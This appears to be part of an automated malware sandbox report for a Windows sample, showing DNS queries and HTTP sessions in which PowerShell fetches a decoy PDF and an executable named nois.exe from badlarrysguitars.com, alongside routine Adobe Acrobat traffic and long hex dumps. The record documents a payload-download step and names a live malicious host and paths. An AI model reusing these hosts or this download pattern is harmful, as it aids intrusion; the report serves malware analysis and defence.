                                                              Dec 6, 2024 15:46:49.592029095 CET49767443192.168.2.950.16.47.176
                                                              Dec 6, 2024 15:46:49.592067003 CET4434976750.16.47.176192.168.2.9
                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 6, 2024 15:46:32.344727993 CET6462153192.168.2.91.1.1.1
                                                              Dec 6, 2024 15:46:33.351093054 CET6462153192.168.2.91.1.1.1
                                                              Dec 6, 2024 15:46:33.416661978 CET53646211.1.1.1192.168.2.9
                                                              Dec 6, 2024 15:46:33.489651918 CET53646211.1.1.1192.168.2.9
                                                              Dec 6, 2024 15:46:45.785567999 CET6296353192.168.2.91.1.1.1
                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 6, 2024 15:46:32.344727993 CET192.168.2.91.1.1.10x78eeStandard query (0)badlarrysguitars.comA (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:33.351093054 CET192.168.2.91.1.1.10x78eeStandard query (0)badlarrysguitars.comA (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:45.785567999 CET192.168.2.91.1.1.10x3430Standard query (0)x1.i.lencr.orgA (IP address)IN (0x0001)false
                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 6, 2024 15:46:26.170120955 CET1.1.1.1192.168.2.90x97e9No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 6, 2024 15:46:26.170120955 CET1.1.1.1192.168.2.90x97e9No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:33.416661978 CET1.1.1.1192.168.2.90x78eeNo error (0)badlarrysguitars.com101.99.75.174A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:33.489651918 CET1.1.1.1192.168.2.90x78eeNo error (0)badlarrysguitars.com101.99.75.174A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:46.010988951 CET1.1.1.1192.168.2.90x3430No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 6, 2024 15:46:47.813539982 CET1.1.1.1192.168.2.90x4b19No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:46:47.813539982 CET1.1.1.1192.168.2.90x4b19No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:00.499907970 CET1.1.1.1192.168.2.90x3075No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:00.499907970 CET1.1.1.1192.168.2.90x3075No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:13.536220074 CET1.1.1.1192.168.2.90xce7dNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:13.536220074 CET1.1.1.1192.168.2.90xce7dNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:37.647252083 CET1.1.1.1192.168.2.90xf9aaNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                              Dec 6, 2024 15:47:37.647252083 CET1.1.1.1192.168.2.90xf9aaNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                              • badlarrysguitars.com
                                                              • https:
                                                                • p13n.adobe.io
                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.949718101.99.75.1744437676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-06 14:46:34 UTC180OUTGET /share/alert.pdf HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: badlarrysguitars.com
                                                              Connection: Keep-Alive
                                                              2024-12-06 14:46:35 UTC322INHTTP/1.1 200 OK
                                                              Date: Fri, 06 Dec 2024 14:46:35 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 126079
                                                              Last-Modified: Fri, 15 Nov 2024 19:44:32 GMT
                                                              Content-Disposition: inline; filename=alert.pdf
                                                              Cache-Control: no-cache
                                                              ETag: "1731699872.0-126079-2713651938"
                                                              Connection: close
                                                              Content-Type: application/pdf
                                                              2024-12-06 14:46:35 UTC7870INData Raw: 25 50 44 46 2d 31 2e 37 0a 25 e2 e3 cf d3 0a 31 20 30 20 6f 62 6a 20 0a 3c 3c 0a 2f 43 6f 6c 6f 72 53 70 61 63 65 20 2f 44 65 76 69 63 65 52 47 42 0a 2f 53 75 62 74 79 70 65 20 2f 49 6d 61 67 65 0a 2f 48 65 69 67 68 74 20 31 30 38 33 0a 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 0a 2f 54 79 70 65 20 2f 58 4f 62 6a 65 63 74 0a 2f 57 69 64 74 68 20 38 35 31 0a 2f 42 69 74 73 50 65 72 43 6f 6d 70 6f 6e 65 6e 74 20 38 0a 2f 4c 65 6e 67 74 68 20 31 32 35 32 32 31 0a 3e 3e 0a 73 74 72 65 61 6d 0a 78 9c ec dd 65 d4 24 d5 d5 b7 71 5c 83 7b 08 04 09 ee 16 dc dd 09 ee 0e 83 c3 e0 ce e0 1a dc dd 5d 07 77 d7 e0 6e 01 82 43 70 12 20 79 12 fa fd ad de 2f 67 55 da ee 1e 63 48 66 5f 1f 66 f5 dd 5d 75 64 9f 2d ff 53 55 dd 53 ab 25 49 92 24 49 92 24 49 92
                                                              Data Ascii: %PDF-1.7%1 0 obj <</ColorSpace /DeviceRGB/Subtype /Image/Height 1083/Filter /FlateDecode/Type /XObject/Width 851/BitsPerComponent 8/Length 125221>>streamxe$q\{]wnCp y/gUcHf_f]ud-SUS%I$I$I
                                                              2024-12-06 14:46:35 UTC7860INData Raw: b9 34 cd 26 e2 8a ee 15 26 3a 32 ce 96 d7 c7 c4 38 75 6a 3c 06 69 16 4a 00 d3 99 8b 5c c1 a3 bc 2e cf 32 c9 c3 0c c2 aa 5c 7a cd 35 d7 94 d5 4d c7 29 1a 57 a4 c2 da 2f be f8 a2 04 c2 0e 4a 8f 14 a4 dc c8 a8 5c da 31 8e a4 eb d8 47 c0 b2 6d ad 2e fc 8c 79 81 05 16 50 b3 1e 7e f8 61 f9 4a 1a 51 86 2e bb ec 32 66 d9 63 8f 3d 34 5b b4 5c 03 2c 20 84 e5 1c 21 e0 b5 da 21 e2 24 9f 98 f2 b1 c7 1e cb a4 d2 8b 4e 7d 6a 6c c2 f6 92 4b 2e 61 0a 8d 33 c5 31 c7 1c a3 0b 06 51 35 74 5a b4 68 15 07 6b 96 05 14 94 07 ea 48 a7 d2 57 08 3f b1 7f ca 29 a7 18 80 c4 cb 74 3c 44 da 94 1f 4c 84 7d 0c 5b a4 4b d4 5e 18 12 e7 91 d8 29 c3 7b ef bd 57 bf 54 19 67 88 30 e7 45 b6 00 96 f5 e0 83 0f f6 11 53 58 8e 59 66 99 45 bd 90 a8 69 57 f9 e1 b9 e7 9e 23 0e d9 9f 7c 22 84 0c db 91
                                                              Data Ascii: 4&&:28uj<iJ\.2\z5M)W/J\1Gm.yP~aJQ.2fc=4[\, !!$N}jlK.a31Q5tZhkHW?)t<DL}[K^){WTg0ESXYfEiW#|"
                                                              2024-12-06 14:46:35 UTC8192INData Raw: 15 c5 3e 31 da f9 e7 9f 7f bf fd f6 8b 7e 63 3a 31 80 ce 63 a8 9a ae c1 3e 65 99 1c a0 86 76 2f fc 62 a5 8a ab c7 60 ca 8e 23 ac 87 10 7e c7 1f 7f 7c 58 2c 8c d9 60 8a 6a 74 34 4f a1 08 bf b2 ca 9d 2d 1c 23 d1 5d d8 30 0c 58 6d b9 c1 eb bc 6f ee 65 d1 cb 61 4e 2f b6 0d ca 00 1c df f0 51 35 70 08 86 1e 85 5f 4b 3f 2f c9 ad 61 2e 55 23 b7 5c 47 9d 3a 2b 0e 6e 99 30 ab 07 97 ae ab 99 ea fb 3a e5 ac 76 0e 13 03 f0 29 2b 45 23 0d f1 1b 0b da d0 78 3b aa 7e 5e 35 69 d4 88 7f d6 69 e9 cf c5 69 1d f6 f9 e7 9f f7 93 f0 eb 1c aa d5 b2 d2 59 f8 19 f9 6e bb ed 36 fb ec b3 7f fa e9 a7 c5 44 ed 16 a8 1d ba 8b e3 7b f4 6a 9f 6e bc f1 c6 8a e6 3b ef bc d3 b2 bb aa 43 1a 7c d8 bf 5a 13 cb c4 ab 09 27 4c ed dc f2 51 73 7e a8 46 44 d5 43 ba 89 b2 6a 2e 0d 2f 8d 76 50 0d fc
                                                              Data Ascii: >1~c:1c>ev/b`#~|X,`jt4O-#]0XmoeaN/Q5p_K?/a.U#\G:+n0:v)+E#x;~^5iiiYn6D{jn;C|Z'LQs~FDCj./vP
                                                              2024-12-06 14:46:35 UTC7808INData Raw: e6 29 44 c8 37 b7 d0 ee 4b a3 cd 3d d6 2a 7e 15 ab 53 cd 12 d5 04 52 1d 40 73 17 d5 d8 69 68 bf 21 70 7a 8c cd 0e 7e 1e ee 11 16 68 58 e2 b2 fa 0d 4b 4c f5 6d b0 c1 06 65 78 d5 8f c2 7a d5 89 94 ae ab 5e 1d eb 5e b5 61 4b 0f 6c 76 b9 86 15 ac 5a af 73 14 54 f3 43 0c b8 8c a1 a5 cf 7c f7 9f ff 91 4a e9 c8 61 cd c9 bc d9 9e d5 ff 4d a9 43 a8 16 0b c7 47 1d dc ac 56 59 f4 ea 7f a5 51 cd ae 1d a6 5f ed 2b 26 db 5c da ba ef ae 61 99 5a d6 c4 6a b5 2a 1d 11 7e 34 61 ec b0 5a 0e bb a1 2c 56 73 54 8f 51 56 bc 25 d6 ba 79 8d 7c b4 ed b6 db da 39 96 9b b3 ed d0 4e 29 3a 0d 1e ee cd aa 6f 74 ae c5 c5 b1 9b 0d d2 f0 5f 9f f4 f8 df 03 b5 5c e8 86 4c 1e ef fc 37 fe 4f 88 49 92 0c 99 3c f3 cc 33 2b ad b4 d2 3b ef bc 33 b8 07 92 f4 40 08 bf c1 3d 8a e4 bf 8f 22 fc 7e e6
                                                              Data Ascii: )D7K=*~SR@sih!pz~hXKLmexz^^aKlvZsTC|JaMCGVYQ_+&\aZj*~4aZ,VsTQV%y|9N):ot_\L7OI<3+;3@="~
                                                              2024-12-06 14:46:35 UTC4544INData Raw: 27 63 b4 6c 56 51 10 4a e5 da d4 b9 e7 9e 2b ab c7 f7 58 09 4b 8d c4 77 2a 75 c1 ab 0d 20 84 9f 7c c5 af 4c 33 4a 06 ad 12 5f fd 16 6e dd 0b 3f 0e 63 fa f1 9d c1 5a 3d 70 b6 de 7a 6b 89 68 c0 85 1f 4f 58 74 d1 45 e3 8a 7d 3c fe 4a 15 6b 59 6e 91 54 2d b1 f4 1b 21 23 a0 ec b9 e4 ba c8 c6 16 57 9e 91 6d 22 7d b1 27 07 5e 71 c5 15 b5 29 57 08 f3 b8 59 cc 02 f1 14 74 3b e1 67 8d bc 13 09 24 be 06 ab 38 8e 34 d2 48 c7 1c 73 4c cb cd 1d 07 30 72 d3 89 2f 32 c8 c3 52 77 fc 54 54 14 17 06 97 3a 96 5c 72 c9 a8 ec ec ac 74 3a 20 ae f8 49 e0 86 cd ce 61 37 ab a9 a9 f2 13 31 55 42 f8 31 63 0c 5b d6 62 a5 d8 00 1a e7 25 97 5c c2 a9 aa b7 7a cb cf b9 48 59 ba 58 63 8d 35 e2 46 43 7c 17 fe 8a 2b ae 70 96 d1 da 29 08 8d fd f7 df 3f be dc d1 af c2 2f 9e 4b 67 55 d9 43 ef
                                                              Data Ascii: 'clVQJ+XKw*u |L3J_n?cZ=pzkhOXtE}<JkYnT-!#Wm"}'^q)WYt;g$84HsL0r/2RwTT:\rt: Ia71UB1c[b%\zHYXc5FC|+p)?/KgUC
                                                              2024-12-06 14:46:35 UTC8192INData Raw: 49 8b c2 b1 46 e6 35 ff fc f3 6b 84 c5 f4 7e e0 81 07 46 ef 4e 24 db 7c 44 35 75 16 7e 1a 27 e7 8a dd 8a f0 ab fd e7 ad 5e 4a 86 dc d2 ce 2b af bc 12 b3 33 98 99 66 9a c9 fa 36 98 45 64 19 09 a5 14 06 0c 29 cb 4f 08 a7 5a fd 56 2f 65 c5 21 6b 4d d8 91 89 62 aa 3e a2 cf 16 c0 72 73 63 63 e3 93 c6 79 cf 3d f7 c4 91 1c 89 3b 51 74 26 d5 8d f0 5b 79 e5 95 63 53 d6 40 08 3f ae 78 ed b5 d7 c6 68 2d 96 39 ae ba ea aa fc 21 84 1f 83 47 56 d1 1a 4b 3a 58 0a 2a a9 c3 f0 f8 cf 7d f7 dd 17 b7 7a 2d b7 de 7d d4 4e f8 59 14 49 8c 03 47 0b 66 ba c7 1e 7b d8 2f d8 c7 35 0f 2f 49 92 64 88 42 75 96 81 65 ef f2 8e cd f2 dc 73 cf bd c6 1a 6b c8 b7 e4 87 42 10 97 7a 6a f5 ef 1e 4a 9e d4 54 91 3a 51 40 e5 7f e5 a3 2a fc e4 f3 3f fc e1 0f 72 af 7a 7a c3 4f fc f1 8f 7f 8c 62 44
                                                              Data Ascii: IF5k~FN$|D5u~'^J+3f6Ed)OZV/e!kMb>rsccy=;Qt&[ycS@?xh-9!GVK:X*}z-}NYIGf{/5/IdBueskBzjJT:Q@*?rzzObD
                                                              2024-12-06 14:46:35 UTC7808INData Raw: 28 04 92 5b 7c 61 50 1e d6 7b 44 4a 15 e9 91 1b cb 18 cd 0f 22 2a 13 c2 56 a6 aa ce 9a a6 b2 a1 33 2a 31 a5 41 8a 85 85 c5 4e a9 86 46 6e 33 68 15 6c 90 1d 66 18 3d de 40 a9 0a 3f d5 9c cc d3 69 f5 80 a8 2c ed 84 ba ae 15 44 33 8d 84 a3 1d ad 29 4c 46 a5 fa 93 76 55 7f 90 e8 54 d2 4b 2e b9 a4 1b e1 17 0f c6 74 43 c4 ac 11 9a 8b c0 bf fe fa eb bd b6 67 57 71 9a 15 af 40 96 55 9a 9f 63 31 60 71 6d 6b 19 75 3f e0 84 0e b6 af ec 46 f8 95 5b b1 38 ef bc f3 38 79 dc fe e8 8f 67 fc 64 57 3e 1f 55 52 47 ca 84 de 8d e1 a1 87 1e 62 99 72 57 a5 56 4f a7 bc 62 b6 d9 66 63 e7 fe 13 7e c6 19 17 3d 82 5e bd 7a 29 85 b2 9c b9 0b 5e 41 54 3c d0 14 66 9e 79 66 89 5d a7 db 6e bb 2d 0b f3 d2 f2 e9 55 57 5d 25 40 34 25 60 39 e7 ce 3b ef 5c 6e 42 59 1d 6d 76 2f fc a8 59 41 ad
                                                              Data Ascii: ([|aP{DJ"*V3*1ANFn3hlf=@?i,D3)LFvUTK.tCgWq@Uc1`qmku?F[88ygdW>URGbrWVObfc~=^z)^AT<fyf]n-UW]%@4%`9;\nBYmv/YA
                                                              2024-12-06 14:46:35 UTC8192INData Raw: 6a 3f 55 69 5b b9 ee 85 9d ef f1 2b 02 fc f3 9f ff ac 79 69 55 51 bd 13 bf 4e d9 69 48 e5 1e bf 91 48 fc 6a da e8 2f f1 1b 5c b9 87 b6 66 ca ea e9 9d 88 5f ab 54 83 db dd a5 d6 49 c9 35 c1 3a 71 c2 6a 27 dd 57 2b 43 86 f7 1e bf fe 46 c7 90 8f df 1b d9 2a 61 2f 35 a8 47 ed b5 3a 46 ab 9c d5 54 5f bb 79 6c e2 26 3a a5 eb de 4b 5b a3 6b b0 d7 ba 1d 3e e2 57 3d d4 5f e2 57 b5 57 6b 59 e9 74 e1 ac c6 b2 3a d9 b1 5f f1 d8 9d 76 b2 45 3c f7 5d e6 38 c3 0c 33 54 c7 fd 8c 13 bf b6 57 67 8a 30 6d c3 ad 13 75 e9 e4 cc 25 b1 b7 46 c7 f0 11 bf ee 81 36 20 c4 af ad 00 9d 44 6a eb 4e b5 e9 74 59 74 14 81 bb 57 c6 32 d0 2e bb ec 52 dd 8b eb 5e d1 da d6 ac 68 50 bd 67 b8 15 6d 85 e9 dd 27 ab a7 77 89 df de 95 dc 25 cf 74 e1 d2 9f 59 54 f3 5b f9 5a 9d 45 a7 1a fd c6 c7 1f
                                                              Data Ascii: j?Ui[+yiUQNiHHj/\f_TI5:qj'W+CF*a/5G:FT_yl&:K[k>W=_WWkYt:_vE<]83TWg0mu%F6 DjNtYtW2.R^hPgm'w%tYT[ZE
                                                              2024-12-06 14:46:35 UTC7808INData Raw: c4 c2 40 aa b0 18 31 71 4b d4 a2 40 26 66 1a a9 43 34 21 72 58 10 3d 58 5f 73 4e d1 84 86 45 3f 08 b3 2c 5a fa b1 f6 14 08 7e 6c 2b 2d 3e 13 e5 8f 6f f3 4c 0a 19 67 9c 71 76 da 69 a7 88 be db 6e bb 8d 12 d8 c8 21 9c 87 73 72 78 f5 c2 40 32 8c 3a f5 c2 0b 2f 44 3f 34 43 ab 7e 74 28 fc 2d 42 23 ea 02 9f c1 e4 fb 54 5d c0 9a 48 0c aa 5f a5 67 a3 0b 49 c1 c5 49 ba 13 3f 7a a0 52 9e 43 b7 92 b0 52 b5 c9 26 9b 84 9f 4b 65 e4 a7 40 0a a7 1f 64 4c 18 c6 06 0b 3f 11 56 d6 4a a5 2b 65 9d 5a 62 23 54 88 f1 2b 7a 88 ca 65 7d 27 cf 3b 2a 5e 78 1a d7 e5 69 6d 2f 25 28 22 9c c7 b9 34 80 54 50 26 17 d2 58 00 52 0b 8b b0 23 57 37 59 29 dd 1c 55 76 8d 25 ff 78 48 81 9e 79 9d fe e9 5f 7b 6d 08 c9 db 49 22 fa 84 bf 1c c2 3d 7a d4 ea 17 1e d6 1d fc 3c 96 81 82 9d ce 31 6a 9a
                                                              Data Ascii: @1qK@&fC4!rX=X_sNE?,Z~l+->oLgqvin!srx@2:/D?4C~t(-B#T]H_gII?zRCR&Ke@dL?VJ+eZb#T+ze}';*^xim/%("4TP&XR#W7Y)Uv%xHy_{mI"=z<1j
                                                              2024-12-06 14:46:35 UTC4544INData Raw: 63 8e 39 fa b5 04 56 ac d5 05 a9 0f bf ea ef 70 9f 1c ac 1a 68 e0 e5 97 5f f6 f9 8f 7f fc e3 34 d3 4c 13 cb bd 17 5f 7c f1 c7 3f fe f1 f2 cb 2f df 76 5d ac 46 48 b9 8f 3d f6 d8 a7 2d ee e7 10 eb ae bb ee 80 13 3f 6e cc 81 0b f1 1b b9 90 18 95 e9 3d f6 d8 43 7e 18 d9 b2 7c aa 30 f1 b9 e7 9e bb 47 e2 f7 d9 47 17 e2 67 e1 af 7c 0c 07 f1 93 4c 38 fc ee bb ef 3e e0 49 af 5f c4 ef f9 e7 9f 9f 76 da 69 93 f8 f5 89 1a f1 db 7b ef bd 67 9b 6d 36 b5 60 e4 4a 15 f8 f4 89 df c1 07 1f 3c c9 24 93 7c ae 89 9f 25 9b 29 0c 07 f1 13 f2 df fe f6 b7 3f d7 c4 af 8a 07 1f 7c 70 ac b1 c6 62 d0 11 dc 76 1b 0e e2 f7 c4 13 4f 88 a9 cf 1a f1 ab e2 c8 23 8f ec 91 f8 25 7a c1 7f ff fb 5f f1 a2 98 8e 3b ee b8 53 4e 39 a5 c2 1a c4 ef e2 8b 2f de 6e bb ed 26 9f 7c 72 da 46 b6 df 7d f7
                                                              Data Ascii: c9Vph_4L_|?/v]FH=-?n=C~|0GGg|L8>I_vi{gm6`J<$|%)?|pbvO#%z_;SN9/n&|rF}


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              1192.168.2.94975850.16.47.1764436304C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-06 14:46:46 UTC1353OUTOPTIONS /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                              Host: p13n.adobe.io
                                                              Connection: keep-alive
                                                              Accept: */*
                                                              Access-Control-Request-Method: GET
                                                              Access-Control-Request-Headers: x-adobe-uuid,x-adobe-uuid-type,x-api-key
                                                              Origin: https://rna-resource.acrobat.com
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://rna-resource.acrobat.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              2024-12-06 14:46:47 UTC572INHTTP/1.1 204 No Content
                                                              Server: openresty
                                                              Date: Fri, 06 Dec 2024 14:46:47 GMT
                                                              Content-Type: text/plain
                                                              Content-Length: 0
                                                              Connection: close
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                              Access-Control-Allow-Credentials: true
                                                              Access-Control-Expose-Headers: x-request-id
                                                              X-Request-Id: CjJBErKJof0188oT8lxfftBebwD6YNGO
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              2192.168.2.94976750.16.47.1764436304C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-06 14:46:48 UTC1473OUTGET /psdk/v2/content?surfaceId=ACROBAT_READER_MASTER_SURFACEID&surfaceId=DC_READER_LAUNCH_CARD&surfaceId=DC_Reader_RHP_Banner&surfaceId=DC_Reader_RHP_Retention&surfaceId=Edit_InApp_Aug2020&surfaceId=DC_FirstMile_Right_Sec_Surface&surfaceId=DC_Reader_Upsell_Cards&surfaceId=DC_FirstMile_Home_View_Surface&surfaceId=DC_Reader_RHP_Intent_Banner&surfaceId=DC_Reader_Disc_LHP_Banner&surfaceId=DC_Reader_Edit_LHP_Banner&surfaceId=DC_Reader_Convert_LHP_Banner&surfaceId=DC_Reader_Sign_LHP_Banner&surfaceId=DC_Reader_More_LHP_Banner&surfaceId=DC_Reader_Disc_LHP_Retention&surfaceId=DC_Reader_Home_LHP_Trial_Banner&adcProductLanguage=en-us&adcVersion=23.6.20320&adcProductType=SingleClientMini&adcOSType=WIN&adcCountryCode=US&adcXAPIClientID=api_reader_desktop_win_23.6.20320&encodingScheme=BASE_64 HTTP/1.1
                                                              Host: p13n.adobe.io
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Chromium";v="105"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) ReaderServices/23.6.20320 Chrome/105.0.0.0 Safari/537.36
                                                              Accept: application/json, text/javascript, */*; q=0.01
                                                              x-adobe-uuid: fdf9e666-cbf4-4e86-8c83-d46a601e2046
                                                              x-adobe-uuid-type: visitorId
                                                              x-api-key: AdobeReader9
                                                              sec-ch-ua-platform: "Windows"
                                                              Origin: https://rna-resource.acrobat.com
                                                              Accept-Language: en-US,en;q=0.9
                                                              Sec-Fetch-Site: cross-site
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Referer: https://rna-resource.acrobat.com/
                                                              Accept-Encoding: gzip, deflate, br
                                                              2024-12-06 14:46:49 UTC608INHTTP/1.1 200
                                                              Server: openresty
                                                              Date: Fri, 06 Dec 2024 14:46:49 GMT
                                                              Content-Type: application/json;charset=UTF-8
                                                              Content-Length: 4762
                                                              Connection: close
                                                              x-request-id: Nzj3yXLMUVV6tbwXKbYvEsdOxTSVWhme
                                                              vary: accept-encoding
                                                              Access-Control-Allow-Origin: *
                                                              Access-Control-Allow-Methods: GET, OPTIONS
                                                              Access-Control-Allow-Headers: Authorization,Content-Type,X-Api-Key,cache-control,User-Agent,If-None-Match,x-adobe-uuid,x-adobe-uuid-type, X-Request-Id
                                                              Access-Control-Allow-Credentials: true
                                                              Access-Control-Expose-Headers: x-request-id
                                                              Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                              2024-12-06 14:46:49 UTC4762INData Raw: 7b 22 73 75 72 66 61 63 65 73 22 3a 7b 22 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 3a 7b 22 63 6f 6e 74 61 69 6e 65 72 73 22 3a 5b 7b 22 63 6f 6e 74 61 69 6e 65 72 49 64 22 3a 31 2c 22 63 6f 6e 74 61 69 6e 65 72 4c 61 62 65 6c 22 3a 22 4a 53 4f 4e 20 66 6f 72 20 44 43 5f 52 65 61 64 65 72 5f 48 6f 6d 65 5f 4c 48 50 5f 54 72 69 61 6c 5f 42 61 6e 6e 65 72 22 2c 22 64 61 74 61 54 79 70 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 2c 22 64 61 74 61 22 3a 22 65 79 4a 6a 64 47 45 69 4f 6e 73 69 64 47 56 34 64 43 49 36 49 6c 52 79 65 53 42 42 59 33 4a 76 59 6d 46 30 49 46 42 79 62 79 4a 39 4c 43 4a 31 61 53 49 36 65 79 4a 30 61 58 52 73 5a 56 39 7a 64 48 6c 73 61 57 35 6e 49 6a 70 37 49 6d
                                                              Data Ascii: {"surfaces":{"DC_Reader_Home_LHP_Trial_Banner":{"containers":[{"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","dataType":"application/json","data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7Im


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              3192.168.2.949768101.99.75.1744431912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-12-06 14:46:48 UTC181OUTGET /private/nois.exe HTTP/1.1
                                                              User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                              Host: badlarrysguitars.com
                                                              Connection: Keep-Alive
                                                              2024-12-06 14:46:49 UTC187INHTTP/1.1 500 INTERNAL SERVER ERROR
                                                              Date: Fri, 06 Dec 2024 14:46:49 GMT
                                                              Server: Apache/2.4.52 (Ubuntu)
                                                              Content-Length: 265
                                                              Connection: close
                                                              Content-Type: text/html; charset=utf-8
                                                              2024-12-06 14:46:49 UTC265INData Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 20 45 69 74 68 65 72 20 74 68 65 20 73 65 72 76 65 72 20 69 73 20 6f 76 65 72 6c 6f 61 64 65 64 20 6f 72 20 74 68 65 72 65 20 69 73 20 61 6e 20 65 72 72 6f 72 20 69 6e 20 74 68 65 20 61 70 70 6c 69 63 61
                                                              Data Ascii: <!doctype html><html lang=en><title>500 Internal Server Error</title><h1>Internal Server Error</h1><p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the applica


                                                              Click to jump to process

                                                              Click to jump to process

                                                              Click to dive into process behavior distribution

                                                              Click to jump to process

                                                              Target ID:0
                                                              Start time:09:46:28
                                                              Start date:06/12/2024
                                                              Path:C:\Users\user\Desktop\lg1wwLsmCX.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\lg1wwLsmCX.exe"
                                                              Imagebase:0x400000
                                                              File size:64'456 bytes
                                                              MD5 hash:1CEB5D0CB063290C1F66FCCFED96A220
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
